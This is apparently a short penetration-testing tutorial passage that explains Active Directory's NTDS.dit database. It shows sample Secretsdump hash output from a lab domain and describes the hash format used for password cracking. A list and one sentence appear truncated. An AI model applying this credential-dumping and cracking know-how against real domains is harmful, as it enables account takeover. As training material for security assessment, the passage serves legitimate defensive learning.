The NTDS.dit file is a database used by Active Directory (AD) to store critical information, including:
Extracting this database allows attackers or security professionals to analyze and potentially crack passwords to assess an organization’s security posture.
Below is an example of a Secretsdump output from a compromised Domain Admin account:
Username:RID:LM_HASH:NT_HASH:::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:920ae267e048417fcfe00f49ecbd4b33:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:e5efba889e477a42ce92a08a552388d6:::
MARVEL.local\\tstark:1103:aad3b435b51404eeaad3b435b51404ee:1bc3af33d22c1c2baec10a32db22c72d:::
MARVEL.local\\SQLService:1104:aad3b435b51404eeaad3b435b51404ee:f4ab68f27303bcb4024650d8fc5f973a:::
MARVEL.local\\fcastle:1105:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
MARVEL.local\\pparker:1107:aad3b435b51404eeaad3b435b51404ee:c39f2beb3d2ec06a62cb887fb391dee0:::
QbBviUCMbV:1110:aad3b435b51404eeaad3b435b51404ee:afc24896d6b14b775a7ba303a9ba4475:::
TqiHKXoSxD:1111:aad3b435b51404eeaad3b435b51404ee:880c15fce05500278cc9d7874ef61ea7:::
hawkeye:1112:aad3b435b51404eeaad3b435b51404ee:43460d636f269c709b20049cee36ae7a:::
HYDRA-DC$:1000:aad3b435b51404eeaad3b435b51404ee:478d9af989f39c84cafcd6b4cb4d87dd:::
THEPUNISHER$:1108:aad3b435b51404eeaad3b435b51404ee:45195d442d68be340536990a8d50c363:::
SPIDERMAN$:1109:aad3b435b51404eeaad3b435b51404ee:96afa04a09388ec38a26ab520ff5e717:::
Each entry follows the format:
Username:RID:LM_HASH:NT_HASH:::
aad3b435b51404eeaad3b435b51404ee, indicating it’s disabled (modern Windows systems disable LM hashing).✅ Only the NT hash is needed for password cracking.